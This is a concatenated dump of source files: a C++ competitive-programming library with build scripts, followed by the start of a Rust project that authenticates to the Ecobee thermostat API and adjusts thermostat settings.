b2 = (fb[i] - conj(fb[j])) * num(0, -ratio);
ra[s] = a1 * b1 + a2 * b2 * num(0, 1);
rb[s] = a1 * b2 + a2 * b1;
swap(i, j);
}
rep (s, 2) fa[j] = ra[s], fb[j] = rb[s], swap(i, j);
}
fft(fa); fft(fb);
rep (i, res.size())
res[i] = (llround(real(fa[i])) +
(llround(real(fb[i])) % mod << 15) +
(llround(imag(fa[i])) % mod << 30)) % mod;
return res;
}
vector<int> inverse(const vector<int> &a, int n = -1) {
assert(a[0]);
if (n < 0) n = a.size();
if (n == 1) return {(int)powmod(a[0], mod - 2)};
auto ret = inverse(a, (n + 1) >> 1), fa = ret * ret * a, fb = ret;
ret.resize(n); fb.resize(n); fa.resize(n);
rep (i, n) ret[i] = ((fb[i] + fb[i] - fa[i]) % mod + mod) % mod;
return ret;
}
vector<int> diff(const vector<int>& a) {
vector<int> ret(a.size());
Rep (i, a.size() - 1) ret[i-1] = 1ll * a[i] * i % mod;
return ret;
}
vector<int> integrate(const vector<int>& a) {
static vector<int> inv = {0, 1};
int n = a.size(); inv.reserve(n);
vector<int> ret(n);
for (int i = inv.size(); i < n; i++)
inv.push_back((mod - 1ll * inv[mod % i] * (mod / i) % mod) % mod);
for (int i = n - 1; i; i--) ret[i] = 1ll * a[i-1] * inv[i] % mod;
return ret;
}
vector<int> log(const vector<int> &a) {
assert(a[0] == 1);
auto ret = diff(a) * inverse(a);
ret.resize(a.size());
return integrate(ret);
}
vector<int> exp(const vector<int> &a, int n = -1) {
assert(a[0] == 0);
if (n < 0) n = a.size();
if (n == 1) return {1};
auto ret = exp(a, (n+1)>>1); ret.resize(n);
auto ff = log(ret); for (int& x : ff) if (x) x = mod - x;
ff[0] = (ff[0] + 1) % mod;
rep (i, n) ff[i] = (ff[i] + a[i]) % mod;
ret = ret * ff; ret.resize(n);
return ret;
}
// quotient remainder
pair<vector<int>, vector<int>>
div(const vector<int> &a, const vector<int> &b) {
int n = a.size(), m = b.size();
if (n < m) return {vector<int>{0}, a};
auto tmp = b; reverse(range(tmp));
tmp = inverse(tmp, n - m + 1);
auto rev = a; reverse(range(rev));
auto q = tmp * rev; q.resize(n - m + 1); reverse(range(q));
auto t = b * q;
vector<int> r(m - 1);
rep (i, m - 1) r[i] = (a[i] - t[i] + mod) % mod;
return {q, r};
}
}
// +++
int main() {
using namespace poly;
typedef vector<int> Poly;
// Multiplication
assert((Poly{1, 2, 3} * Poly{3, 4} == Poly{3, 10, 17, 12}));
// Inverse
assert((inverse(Poly{1, 7, 4, 9, 8}) ==
Poly{1, 998244346, 45, 998244057, 1947}));
// Differetiate
assert((diff(Poly{2, 4, 5, 6}) == Poly{4, 10, 18, 0}));
// Integrate
assert((integrate(Poly{4, 6, 18, 12, 0}) == Poly{0, 4, 3, 6, 3}));
// Log
assert((log(Poly{1, 6, 4, 0}) == Poly{0, 6, 998244339, 48}));
// Exp
assert((exp(Poly{0, 3, 6, 1}) == Poly{1, 3, 499122187, 499122200}));
// Division
assert(div(Poly{3, 3, 1}, Poly{1, 1}) == make_pair(Poly{2, 1}, Poly{1}));
}
<file_sep>#include <bits/stdc++.h>
using namespace std;
#define rep(i, n) for (int i = 0; i < int(n); i++)
#define Rep(i, n) for (int i = 1; i <=int(n); i++)
#define range(x) begin(x), end(x)
#ifdef __LOCAL_DEBUG__
#define _debug(fmt, ...) fprintf(stderr, "[%s] " fmt "\n", __func__, ##__VA_ARGS__)
#else
#define _debug(...) ((void) 0)
#endif
typedef long long LL;
/*
%%%
title: Segment Tree with Dynamic Node Allocation
usage:
init(l, r): initialize the tree in range $[l, r)$
add(l, r, v): add $v$ to range $[l, r)$
sum(l, r): return the sum in range $[l, r)$
%%%
*/
// +++
const int MAXN = (1 << 17) * 20;
int lbnd, rbnd, sz;
int lson[MAXN], rson[MAXN];
LL val[MAXN], tag[MAXN];
inline int alloc() {
lson[sz] = rson[sz] = val[sz] = tag[sz] = 0;
return sz++;
}
#define lson (lson[o] = lson[o] ?: alloc())
#define rson (rson[o] = rson[o] ?: alloc())
void init(int l, int r) {
lbnd = l; rbnd = r; sz = 2;
}
void pull(int o) {
val[o] = val[lson] + val[rson];
}
void fadd(LL x, int o, int ll, int rr) {
val[o] += x * (rr - ll);
tag[o] += x;
}
void push(int o, int ll, int rr) {
int mm = (ll + rr) / 2;
fadd(tag[o], lson, ll, mm);
fadd(tag[o], rson, mm, rr);
tag[o] = 0;
}
void add(int l, int r, LL v, int o = 1, int ll = lbnd, int rr = rbnd) {
if (l <= ll and rr <= r) return fadd(v, o, ll, rr);
int mm = (ll + rr) / 2;
push(o, ll, rr);
if (mm > l) add(l, r, v, lson, ll, mm);
if (mm < r) add(l, r, v, rson, mm, rr);
pull(o);
}
LL sum(int l, int r, int o = 1, int ll = lbnd, int rr = rbnd) {
if (l <= ll and rr <= r) return val[o];
int mm = (ll + rr) / 2;
push(o, ll, rr);
if (r <= mm) return sum(l, r, lson, ll, mm);
if (l >= mm) return sum(l, r, rson, mm, rr);
return sum(l, r, lson, ll, mm) + sum(l, r, rson, mm, rr);
}
// +++
int main() {
init(1, 6);
add(1, 2, 1);
add(2, 3, 5);
add(3, 4, 4);
add(4, 5, 2);
add(5, 6, 3);
assert(sum(2, 5) == 11);
add(2, 4, 2);
assert(sum(3, 5) == 8);
add(1, 6, 1);
assert(sum(1, 5) == 20);
return 0;
}
<file_sep>#!/bin/bash
./script/extract.py +++ "$1"
<file_sep>.DEFAULT_GOAL = tex
.PHONY : tex test clean
TEX_SRCS=$(shell find src tex -type f)
build/tex/code.tex : $(TEX_SRCS) script/*
mkdir -p $(dir $@)
./script/make-tex.py > build/tex/code.tex
build/tex/main.pdf : $(TEX_SRCS) script/* build/tex/code.tex
mkdir -p $(dir $@)
cp -r tex build/
cd build/tex && xelatex main.tex
cd build/tex && xelatex main.tex
tex : build/tex/main.pdf
xdg-open $<
SRC_CODES = $(shell ./script/get-srclist.py)
SRC_TARGETS = $(SRC_CODES:src/%.cpp=build/%.exec)
CXX ?= g++
CXXFLAGS = -Wall -std=c++14 -ggdb
CXXFLAGS += -fsanitize=undefined,address
GCOV ?= gcov
build/%.exec: src/%.cpp
@echo + [CXX] $@
@mkdir -p $(dir $@)
@cd $(dir $@) && $(CXX) $(CXXFLAGS) -ftest-coverage -fprofile-arcs ../../$< -o $(notdir $@)
build/%.gcda : build/%.exec src/%.cpp
@echo + [GCOV] $@
@cd $(dir $@) && ./$(notdir $<)
@cd $(dir $@) && $(GCOV) -n -o $(notdir $@) $(notdir $(word 2,$^)) > /dev/null
test : $(SRC_CODES:src/%.cpp=build/%.gcda) build/tex/code.tex
clean :
rm -rf build
.DELETE_ON_ERROR:
<file_sep>#!/bin/bash
sudo apt update
sudo apt install python3-pip
sudo pip install oyaml
sudo pip3 install oyaml
<file_sep>#!/usr/bin/env python3
import re, os, hashlib, sys
import subprocess
import oyaml as yaml
LANGS = {'c': 'C', 'cpp': 'C++', 'py': 'Python', 'java': 'Java'}
def digest(s) :
return hashlib.md5(re.sub(r'\s|//.*', '', s).encode('utf8')).hexdigest()[-4:]
line_cnt = 0
recipe = yaml.load(open('recipe.yml').read(), Loader = yaml.SafeLoader)
for cat, ls in recipe.items() :
print('\\section{%s}' % cat.replace('_', ' ').title())
for fn in ls :
filename = 'src/' + cat + '/' + fn
ext = fn.split('.')[-1]
meta = yaml.load(
subprocess.check_output(['./script/extract.py', '%%%', filename]),
Loader = yaml.SafeLoader
)
code = subprocess.check_output(['./script/extract-src.sh', filename]).decode('utf8')
title = meta['title']
desc = meta.get('desc', None)
usage = meta.get('usage', None)
sect = [ '\\subsection{%s}' % title ]
if desc :
sect.append(desc.strip())
sect.append('')
if usage :
sect.append('\\textbf{Usage:}\\par')
sect.append('\\begin{tabular}{p{3.5cm} p{8cm}}')
for funct, descript in usage.items() :
sect.append('\lstinline|{0}| & {1} \\\\'.format(funct, descript))
sect.append('\\end{tabular}')
for line in code.split('\n'):
sect.append('\\createlinenumber{%d}{%s}' % (line_cnt, digest(line)))
line_cnt += 1
sect.append('\\begin{lstlisting}[language=%s]' %
LANGS.get(ext, '{}a').lower())
sect.append(code)
sect.append('\\end{lstlisting}')
print('\n'.join(sect))
<file_sep>/*
%%%
title: Nim Multiplication
author: Roundgod
%%%
*/
#include <bits/stdc++.h>
using namespace std;
// +++
int nim_mult_pow(int x, int y) {
if (x < 2) return x & y;
int m = 1;
while (x >= 1 << (m << 1)) m <<= 1;
int p = x >> m, s = y >> m, t = y & ((1 << m) - 1);
int d1 = nim_mult_pow(p, s);
int d2 = nim_mult_pow(p, t);
return ((d1 ^ d2) << m) ^ nim_mult_pow(1 << (m - 1), d1);
}
int nim_mult(int x, int y) {
if (x < y) swap(x, y);
if (x < 2) return x & y;
int m = 1;
while (x >= 1 << (m << 1)) m <<= 1;
int p = x >> m, q = x & ((1 << m) - 1);
int s = y >> m, t = y & ((1 << m) - 1);
int c1 = nim_mult(p, s);
int c2 = nim_mult(p, t) ^ nim_mult(q, s);
int c3 = nim_mult(q, t);
return ((c1 ^ c2) << m) ^ c3 ^ nim_mult_pow(1 << (m - 1), c1);
}
// +++
int main() {
assert(nim_mult(0, 0) == 0);
assert(nim_mult(0, 3) == 0);
assert(nim_mult(0, 5) == 0);
assert(nim_mult(1, 1) == 1);
assert(nim_mult(4, 7) == 10);
assert(nim_mult(9, 6) == 1);
assert(nim_mult(4, 8) == 11);
}
<file_sep>#!/usr/bin/env python3
import sys
if len(sys.argv) > 2 : sys.stdin = open(sys.argv[2], 'r')
text = sys.stdin.readlines()
ls = []
for i, s in enumerate(text) :
if sys.argv[1] in s : ls.append(i)
if len(ls) != 2 :
sys.stderr.write('Illegal number of indicators ({0})!\n'.format(len(ls)))
exit(1)
ls[0] += 1
while ls[0] < ls[1] and text[ls[0]].strip() == '\n' : ls[0] += 1
while ls[0] < ls[1] and text[ls[1]-1].strip() == '\n' : ls[1] -= 1
sys.stdout.write(''.join(text[ls[0] : ls[1]]))
<file_sep>#!/usr/bin/env python3
import oyaml as yaml
recipe = yaml.load(open('recipe.yml').read(), Loader=yaml.SafeLoader)
for cat, ls in recipe.items() :
for fn in ls :
print('src/' + cat + '/' + fn)
<file_sep>/*
%%%
title: Basic Geometry Template
author: sy_chen
%%%
*/
#pragma GCC optimize("fast-math")
#include <bits/stdc++.h>
using namespace std;
#define rep(i, n) for (int i = 0; i < int(n); i++)
#define Rep(i, n) for (int i = 1; i <=int(n); i++)
#define range(x) begin(x), end(x)
// +++
typedef double T;
inline int fcmp(T a, T b = 0) {
if (fabs(a - b) < 1e-9) return 0; // add EPS if necessary
return a < b ? -1 : 1;
}
// Point
typedef complex<T> pt, vec;
inline pt operator ^ (pt a, pt b) { return a * b; }
inline T operator , (pt a, pt b)
{ return real(a) * real(b) + imag(a) * imag(b); }
inline T operator * (pt a, pt b)
{ return real(a) * imag(b) - imag(a) * real(b); }
inline bool operator == (pt a, pt b) { return fcmp(abs(a - b)) == 0; }
// >0: in order, <0: out of order, =0: nonstandard
inline int rotOrder(vec a, vec b, vec c) {
return fcmp(double(a*b) * (b*c));
}
pt unit(pt x) { return x / abs(x); }
// Segment
typedef pair<pt, pt> seg;
inline bool operator & (seg s, pt p) { // pt in seg
vec v1 = s.first - p, v2 = s.second - p;
return (v1, v2) <= 0 and v1 * v2 == 0;
}
T distance(pt p, seg S) {
pt s, t; tie(s, t) = S;
if (fcmp((p - s, t - s)) <= 0) return abs(p - s);
if (fcmp((p - t, s - t)) <= 0) return abs(p - t);
return abs((s - p) * (t - p)) / abs(s - t);
}
T distance(seg S, seg T) {
return min({distance(S.first, T), distance(S.second, T),
distance(T.first, S), distance(T.second, S)});
}
inline bool nIntRectRect(seg a, seg b) {
rep (i, 2) {
if (min(real(a.first), real(a.second)) <
max(real(b.first), real(b.second))) return false;
if (min(imag(a.first), imag(a.second)) <
max(imag(b.first), imag(b.second))) return false;
swap(a, b);
}
return true;
}
inline bool operator & (seg a, seg b) { // seg seg intersection
if (!nIntRectRect(a, b)) return false;
return rotOrder(b.first-a.first, a.second-a.first, b.second-a.first) >= 0 &&
rotOrder(a.first-b.first, b.second-b.first, a.second-b.first) >= 0;
}
inline pt getIntersection(pt P, vec v, pt Q, vec w) { // line line intersection
return P + v * (w * (P - Q) / (v * w));
}
inline pt project(pt p, seg S) { // project p to line s
pt s, t; tie(s, t) = S;
double r = (t - s, p - s) / norm(t - s);
return s + r * (t - s);
}
// Polygon
struct polygon : vector<pt> {
pt& get(int id) {
while (id < 0) id += size();
while (id >= size()) id -= size();
return at(id);
}
pt& operator [] (int id) { return get(id); }
seg getseg(int id) { // {pts[id], pts[id+1]}
return {get(id), get(id+1)};
}
// Make convex hull from a set of points.
// The result starts from the point with minimum x (and minimum y if
// multiple) and is in counterclockwise order. If you want non-strict
// convex hull, change all <= into <.
void make_hull(vector<pt> pts) {
sort(pts.begin(), pts.end(), [] (pt a, pt b) {
return make_pair(real(a), imag(a)) < make_pair(real(b), imag(b));
});
int k = 0;
resize(pts.size()*2);
for (int i = 0; i < pts.size(); i++) {
while (k > 1 and (at(k-1)-at(k-2)) * (pts[i]-at(k-1)) <= 0) k--;
at(k++) = pts[i];
}
for (int i = pts.size() - 2, t = k; i >= 0; i--) {
while (k > t and (at(k-1)-at(k-2)) * (pts[i]-at(k-1)) <= 0) k--;
at(k++) = pts[i];
}
resize(k-1);
}
bool operator & (pt p) {
int wn = 0;
rep (i, size()) {
if (make_pair(get(i), get(i+1)) & p) return true; // on the border
int d1 = fcmp(imag(get(i)), imag(p));
int d2 = fcmp(imag(get(i+1)), imag(p));
int k = fcmp((get(i+1) - get(i)) * (p - get(i)));
if (k > 0 and d1 <= 0 and d2 > 0) wn++;
if (k < 0 and d2 <= 0 and d1 > 0) wn--;
}
return wn;
}
bool convex_contain(pt p) { // non-strict, passed "SPOJ INOROUT"
auto qs = [&] (int x) { return at(x) - front(); };
vec q = back() - front(); p -= front();
if (rotOrder(p, qs(1), q) < 0) return false;
int l = 0, r = size() - 1;
while (l + 1 < r) {
int m = (l + r) / 2;
if (rotOrder(p, qs(m), q)) l = m; else r = m;
}
if (l == 0) return false;
vec lp = qs(l), rp = qs(r);
return fcmp(fabs(lp * p) + fabs(p * rp) + fabs((rp - lp) * (p - lp)),
lp * rp) == 0;
}
};
// +++
void class_test() {
pt x; x = polar(1.0, 0.0);
assert(arg(x) == 0);
x = 0;
}
void point_test() {
assert(pt(1, 2) + pt(2, 3) == pt(3, 5));
assert(pt(2, 4) - pt(1, 6) == pt(1, -2));
pt x(1, 2);
x += pt(2, 4); assert(x == pt(3, 6));
x *= 2; assert(x == pt(6, 12));
x /= 2; assert(x == pt(3, 6));
x -= pt(3, 4); assert(x == pt(0, 2));
assert((pt(1, 2), pt(2, 3)) == 8);
assert((pt(1, 2) * pt(-5, 3)) == 13);
assert(getIntersection({0, 0}, {1, 1}, {2, 0}, {0, 1}) == pt(2, 2));
assert(project(pt(0, 2), make_pair(pt(0, 0), pt(2, 2))) == pt(1, 1));
assert(fcmp(distance(pt(0, 0), {pt(3, 4), pt(3, 5)}), 5) == 0);
assert(fcmp(distance(pt(0, 0), {pt(3, 5), pt(3, 4)}), 5) == 0);
assert(fcmp(distance(pt(1, 1), {pt(0, 0), pt(0, 2)}), 1) == 0);
}
void polygon_test() {
polygon a;
a.emplace_back(1, 2);
a.emplace_back(2, 3);
a.emplace_back(3, 4);
assert((a == vector<pt>{{1, 2}, {2, 3}, {3, 4}}));
assert(a.get(-1) == pt(3, 4));
assert(a.get(1) == pt(2, 3));
assert(a.get(3) == pt(1, 2));
a.make_hull(vector<pt>{{0, 0}, {0, 1}, {1, 1}, {1, 0}, {0.5, 0.5}, {0, 0.5}});
assert((a == vector<pt>{{0, 0}, {1, 0}, {1, 1}, {0, 1}}));
assert((a & pt{0.5, 0.5}) == true);
assert((a & pt{0, 0.5}) == true);
assert((a & pt{1, 2}) == false);
}
int main() {
class_test();
point_test();
polygon_test();
return 0;
}
|
2ef6256735de73244c0f17f276aecb637049c012
|
[
"Markdown",
"Makefile",
"Python",
"C++",
"Shell"
] | 12
|
Markdown
|
nju-calabash/code-library
|
5db8e05c9fa415cb0b0191e75dc62bd1e0445b4e
|
5a104b6b7a8d4d66d7289a45438b18675b4e2be1
|
refs/heads/master
|
<repo_name>tjaart/fluent-proc<file_sep>/FluentProc/ProcessRunner.cs
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
namespace Tests
{
public class ProcessRunner
{
public ProcessRunner(string processPath)
{
ProcessPath = processPath;
}
public Action<int>? ExitHandler { get; set; }
public Action<string>? DataHandler { get; set; }
public string ProcessPath { get; }
public List<string> Args { get; set; } = new List<string>();
public RunningProcess Run()
{
var process = new Process
{
StartInfo =
{
UseShellExecute = false,
FileName = ProcessPath
}, EnableRaisingEvents = true
};
process.StartInfo.RedirectStandardOutput = true;
process.OutputDataReceived += (sender, args) => { DataHandler(args.Data); };
process.StartInfo.Arguments = string.Join(' ', Args);
if (ExitHandler != null)
{
process.Exited += (sender, args) => { ExitHandler(process.ExitCode); };
}
process.Start();
process.BeginOutputReadLine();
return new RunningProcess(process);
}
}
}<file_sep>/FluentProc/ArgumentHelper.cs
namespace Tests
{
public class ArgumentHelper
{
private readonly string _argument;
public ArgumentHelper(string argument)
{
_argument = argument;
}
public string SanitizeArgument()
{
var finalArg = _argument;
finalArg = QuoteArgumentWithSpaces(finalArg);
return finalArg;
}
private string QuoteArgumentWithSpaces(string argument)
{
if (argument.Contains(" "))
{
return $"\"{argument}\"";
}
return argument;
}
}
}<file_sep>/FluentProc/ProcessBuilder.cs
using System;
using System.Collections.Generic;
using System.IO;
namespace Tests
{
public class ProcessBuilder
{
private readonly string _processPath;
private Action<int>? _exitHandler;
private readonly List<string> _args = new List<string>();
private Action<string>? _dataHandler;
private ProcessBuilder(string processPath)
{
_processPath = processPath;
}
public static ProcessBuilder Create(string processPath)
{
return new ProcessBuilder(processPath);
}
public ProcessBuilder HandleExit(Action<int> exitHandler)
{
_exitHandler = exitHandler;
return this;
}
public ProcessBuilder Arg(in string argument)
{
if (_args.Contains(argument))
{
return this;
}
_args.Add( new ArgumentHelper(argument).SanitizeArgument());
return this;
}
public ProcessBuilder HandleOutput(Action<string> handleDataAction)
{
_dataHandler = handleDataAction;
return this;
}
public ProcessRunner Build()
{
return new ProcessRunner(_processPath)
{
ExitHandler = _exitHandler,
DataHandler = _dataHandler,
Args = _args,
};
}
}
}<file_sep>/Tests/ProcessBuilderTests.cs
using System.Collections.Immutable;
using System.Text;
using System.Threading.Tasks;
using Xunit;
namespace Tests
{
public class ProcessBuilderTests
{
[Fact]
public void TestRunTaskWithNormalExitCode()
{
var exitCode = -100;
var proc = ProcessBuilder.Create("ls")
.HandleExit(code =>
{
exitCode = code;
})
.Build();
var runningProcess = proc.Run();
runningProcess.WaitForExit();
Assert.Equal(0, exitCode);
}
[Fact]
public void TestRunTaskWithOutput()
{
var outputStr = new StringBuilder();
var proc = ProcessBuilder.Create("ls")
.Arg("/").Arg("-l")
.HandleExit(code =>
{
var exitCode = code;
})
.HandleOutput(s => { outputStr.AppendLine(s); })
.Build();
var runningProcess = proc.Run();
runningProcess.WaitForExit();
var final = outputStr.ToString();
Assert.True(final.Length > 0);
}
[Fact]
public void TestRunTaskWithArgument()
{
var exitCode = -100;
var proc = ProcessBuilder.Create("ls")
.Arg("/")
.HandleExit(code =>
{
exitCode = code;
})
.Build();
var runningProcess = proc.Run();
runningProcess.WaitForExit();
Assert.Equal(0, exitCode);
}
[Fact]
public async Task TestRunTaskWithAsyncWait()
{
var exitCode = -100;
var proc = ProcessBuilder.Create("ls")
.HandleExit(code =>
{
exitCode = code;
})
.Build();
var runningProcess = proc.Run();
await runningProcess.WaitForExitAsync();
Assert.Equal(0, exitCode);
}
}
}<file_sep>/FluentProc/RunningProcess.cs
using System;
using System.Diagnostics;
using System.Threading.Tasks;
namespace Tests
{
public class RunningProcess
{
private readonly Process _process;
private Task? _waitingTask;
public RunningProcess(Process process)
{
_process = process;
}
public void WaitForExit(TimeSpan? timeOut = null)
{
if (timeOut == null)
{
timeOut = TimeSpan.FromSeconds(10);
}
Task.Delay(timeOut.Value).ContinueWith(task => { _process.Kill(); });
_process.WaitForExit();
}
public Task WaitForExitAsync(TimeSpan? timeOut = null)
{
if (_waitingTask == null)
{
_waitingTask = Task.Factory.StartNew(() => { WaitForExit(timeOut); });
}
return _waitingTask;
}
}
}
|
19f46fea96f00c566399e8e65c30e4dcf410e3f3
|
[
"C#"
] | 5
|
C#
|
tjaart/fluent-proc
|
327608ad06a7e4c9d7888d502d79c102ad886afa
|
30802a5ea2702a027ba4a500245720b8bde22803
|
refs/heads/master
|
<file_sep>
module.exports = {
"server": {
"baseDir": ["./src", "./build/contracts"]
},
"port": process.env.PORT || 3000,
"open" : false
}
<file_sep>var ZainCoin = artifacts.require("ZainCoin");
module.exports = function(deployer) {
deployer.deploy(ZainCoin);
}<file_sep># zaincoin
Simple implementation of erc20 for my friends
|
f7de74588159222f1de528099ab7280604634ddd
|
[
"JavaScript",
"Markdown"
] | 3
|
JavaScript
|
sprect8/zaincoin
|
fa3410d846130b4ad92d2a48f60419ac2b905eb2
|
0a752b499d01f618e2e8e8ee5edbdfb6a356c6b3
|
refs/heads/master
|
<repo_name>fanzeyi/castform<file_sep>/Cargo.toml
[package]
name = "castform"
version = "0.1.0"
authors = ["<NAME> <<EMAIL>>"]
[dependencies]
actix = "0.7"
actix_derive = "0.3"
actix-web = "*"
clap = "*"
failure = "0.1"
futures = "0.1"
hyper = "0.12"
hyper-tls = "0.3"
http = "0.1"
serde = "1.0"
serde_derive = "1.0"
serde_json = "1.0"
serde_urlencoded = "0.5.1"
tokio = "0.1"
toml = "0.4"
<file_sep>/src/ecobee.rs
use std::collections::HashMap;
use std::time::Duration;
use actix::{Actor, Arbiter, AsyncContext, Context, Handler, Message};
use failure::{err_msg, Error};
use futures::{Future, IntoFuture, Stream};
use http::request::Builder;
use http::Request;
use hyper::client::HttpConnector;
use hyper::{Body, Client, Uri};
use hyper_tls::HttpsConnector;
use serde::de::DeserializeOwned;
use serde_json;
use serde_json::Value;
use serde_urlencoded;
use config::Config;
use query::EcobeeQuery;
use response::{EcobeeResponse, EcobeeStatus};
use Result;
trait FutureExt<I, E, F: Future<Item = I, Error = E>> {
fn boxify(self) -> Box<F>;
}
impl<I, E, F> FutureExt<I, E, F> for F
where
F: Future<Item = I, Error = E> + 'static,
{
fn boxify(self) -> Box<F> {
Box::new(self)
}
}
fn ftoc(f: f32) -> f32 {
((f - 32.0) / 1.8 * 10.0).round() / 10.0
}
fn ctof(c: f32) -> f32 {
(c * 1.8) + 32.0
}
#[derive(Deserialize, Clone, Debug)]
struct AuthToken {
access_token: String,
refresh_token: String,
}
#[derive(Deserialize, Debug)]
struct ErrorMessage {
error: String,
error_description: String,
}
#[derive(Deserialize, Debug)]
#[serde(rename_all = "camelCase")]
struct ThermostatRuntime {
#[serde(rename = "actualTemperature")]
temperature: usize,
#[serde(rename = "actualHumidity")]
humidity: usize,
desired_heat: usize,
desired_cool: usize,
desired_humidity: usize,
}
#[derive(Deserialize, Debug)]
#[serde(rename_all = "camelCase")]
struct ThermostatSettings {
hvac_mode: String,
}
#[derive(Deserialize, Debug)]
struct Thermostat {
identifier: String,
runtime: ThermostatRuntime,
settings: ThermostatSettings,
#[serde(flatten)]
other: HashMap<String, Value>,
}
#[derive(Deserialize, Debug)]
struct ThermostatResponse {
#[serde(rename = "thermostatList")]
thermostats: Vec<Thermostat>,
}
#[derive(Deserialize, Debug)]
struct UpdateResponse {
#[serde(flatten)]
other: HashMap<String, Value>,
}
#[derive(Debug, Fail)]
enum ErrorKind {
#[fail(display = "remote error: {:?}", _0)]
RemoteError(ErrorMessage),
}
pub struct EcobeeActor {
client_id: String,
client: Client<HttpsConnector<HttpConnector>, Body>,
username: String,
password: String,
auth_token: Option<AuthToken>,
thermostats: Vec<Thermostat>,
}
impl EcobeeActor {
const API_BASE: &'static str = "https://api.ecobee.com";
fn build_client() -> Result<Client<HttpsConnector<HttpConnector>>> {
let https = HttpsConnector::new(4)?;
Ok(Client::builder().build::<_, Body>(https))
}
fn build_url(path: &str, payload: Vec<(&str, String)>) -> Result<Uri> {
let url = if payload.is_empty() {
format!("{}{}", Self::API_BASE, path)
} else {
let query: String = serde_urlencoded::to_string(&payload).map_err(Error::from)?;
format!("{}{}?{}", Self::API_BASE, path, query)
};
url.parse().map_err(From::from)
}
pub fn from_config(config: &Config) -> Result<Self> {
Ok(Self {
client_id: config.client_id.clone(),
client: Self::build_client()?,
username: config.username.clone(),
password: config.password.clone(),
auth_token: None,
thermostats: Vec::new(),
})
}
fn send_request<R: DeserializeOwned + Send + 'static>(
&self,
request: Request<Body>,
) -> Box<Future<Item = R, Error = Error> + Send> {
self.client
.request(request)
.and_then(|resp| resp.into_body().concat2())
.map(|chunk| chunk.to_vec())
.map_err(|e| -> Error { e.into() })
.and_then(|data| {
serde_json::from_slice(&data[..]).map_err(move |e| {
let error_message = serde_json::from_slice::<ErrorMessage>(&data[..]);
match error_message {
Ok(message) => ErrorKind::RemoteError(message).into(),
Err(_) => e.into(),
}
})
})
.boxify()
}
fn auth(
&self,
username: String,
password: String,
) -> impl Future<Item = AuthToken, Error = Error> {
let payload = [
("client_id", self.client_id.clone()),
("username", username),
("password", <PASSWORD>),
("scope", "smartWrite".into()),
("response_type", "ecobeeAuthz".into()),
];
let body = serde_json::to_string(&payload).expect("serialized json");
let req = Self::build_url("/authorize", payload.to_vec()).and_then(|url| {
self.default_request(false).and_then(|mut req| {
req.method("POST")
.uri(url)
.body(body.into())
.map_err(|e| e.into())
})
});
match req {
Ok(req) => self.send_request(req),
Err(err) => Err(err_msg(format!("failed to build the request: {:?}", err)))
.into_future()
.boxify(),
}
}
fn refresh_token(&self, refresh: String) -> impl Future<Item = AuthToken, Error = Error> {
let payload = [
("client_id", self.client_id.clone()),
("refresh_token", refresh),
("grant_type", "refresh_token".into()),
];
let req = Self::build_url("/token", payload.to_vec()).and_then(|url| {
self.default_request(false).and_then(|mut req| {
req.method("POST")
.uri(url)
.body(Body::empty())
.map_err(|e| e.into())
})
});
match req {
Ok(req) => self.send_request(req),
Err(err) => Err(err_msg(format!("failed to build the request: {:?}", err)))
.into_future()
.boxify(),
}
}
fn get_thermostat(&self) -> impl Future<Item = ThermostatResponse, Error = Error> {
let payload = [
("json", r#"{"selection":{"includeOemCfg":"true","includeAlerts":"true","includeVersion":"true","includeLocation":"true","selectionType":"registered","includeEvents":"true","includeHouseDetails":"true","includeRuntime":"true","includeNotificationSettings":"true","includeProgram":"true","includeWeather":"true","includePrivacy":"true","includeSecuritySettings":"true","includeSettings":"true","includeExtendedRuntime":"true","includeSensors":"true","includeTechnician":"true"}}"#.into())
];
let req = Self::build_url("/1/thermostat", payload.to_vec()).and_then(|url| {
self.default_request(true).and_then(|mut req| {
req.method("GET")
.uri(url)
.body(Body::empty())
.map_err(|e| e.into())
})
});
match req {
Ok(req) => self.send_request(req),
Err(err) => Err(err_msg(format!("failed to build the request: {:?}", err)))
.into_future()
.boxify(),
}
}
fn set_hvac_mode(
&self,
identifier: String,
mode: u8,
) -> Box<Future<Item = UpdateResponse, Error = Error> + Send> {
let mode = match mode {
1 => "heat",
2 => "cool",
3 => "auto",
_ => "off",
};
let payload = json!({
"selection": {
"selectionType": "thermostats",
"selectionMatch": identifier,
},
"thermostat": [{
"settings": {
"hvacMode": mode
}
}]
});
let req =
Self::build_url("/1/thermostat?format=json&format=json", Vec::new()).and_then(|url| {
self.default_request(true).and_then(|mut req| {
req.method("POST")
.uri(url)
.body(payload.to_string().into())
.map_err(|e| e.into())
})
});
match req {
Ok(req) => Box::new(self.send_request(req)),
Err(err) => Err(err_msg(format!("failed to build the request: {:?}", err)))
.into_future()
.boxify(),
}
}
fn set_temperature(
&self,
identifier: String,
heat: u16,
cool: u16, /* 770 */
) -> impl Future<Item = UpdateResponse, Error = Error> {
let payload = json!({
"selection": {
"selectionType": "thermostats",
"selectionMatch": identifier,
},
"functions": [{
"type": "setHold",
"params": {
"heatHoldTemp": heat,
"coolHoldTemp": cool,
"holdType": "indefinite"
}
}]
});
println!("payload: {:?}", payload);
let req =
Self::build_url("/1/thermostat?format=json&format=json", Vec::new()).and_then(|url| {
self.default_request(true).and_then(|mut req| {
req.method("POST")
.uri(url)
.body(payload.to_string().into())
.map_err(|e| e.into())
})
});
match req {
Ok(req) => self.send_request(req),
Err(err) => Err(err_msg(format!("failed to build the request: {:?}", err)))
.into_future()
.boxify(),
}
}
fn default_request(&self, auth: bool) -> Result<Builder> {
let mut builder = Request::builder();
builder
.header(
"User-Agent",
"Home Comfort/1.3.0 (iPhone; iOS 11.4; Scale/2.00)",
)
.header("X-ECOBEE-APP", "ecobee-ios");
if auth {
let token = self
.auth_token
.clone()
.ok_or_else(|| err_msg("auth token is not set yet"))?;
let value = format!("Bearer {}", token.access_token);
builder.header("Authorization", &value[..]);
}
Ok(builder)
}
}
impl Actor for EcobeeActor {
type Context = Context<Self>;
fn started(&mut self, ctx: &mut Self::Context) {
let username = self.username.clone();
let password = self.password.clone();
let addr = ctx.address();
let auth = self
.auth(username, password)
.and_then(move |token| {
addr.try_send(SetAuthToken(token))
.map_err(|_| err_msg("send error"))
})
.map_err(|err| {
println!("{}", err);
});
Arbiter::spawn(auth);
ctx.run_interval(Duration::from_secs(60 * 60 * 24), |actor, context| {
if let Some(token) = actor.auth_token.clone() {
let addr = context.address();
println!("refreshing token...");
let refresh = actor
.refresh_token(token.refresh_token)
.map(move |token| {
if let Err(_) = addr.try_send(SetAuthToken(token)) {
eprintln!("send failed.");
}
})
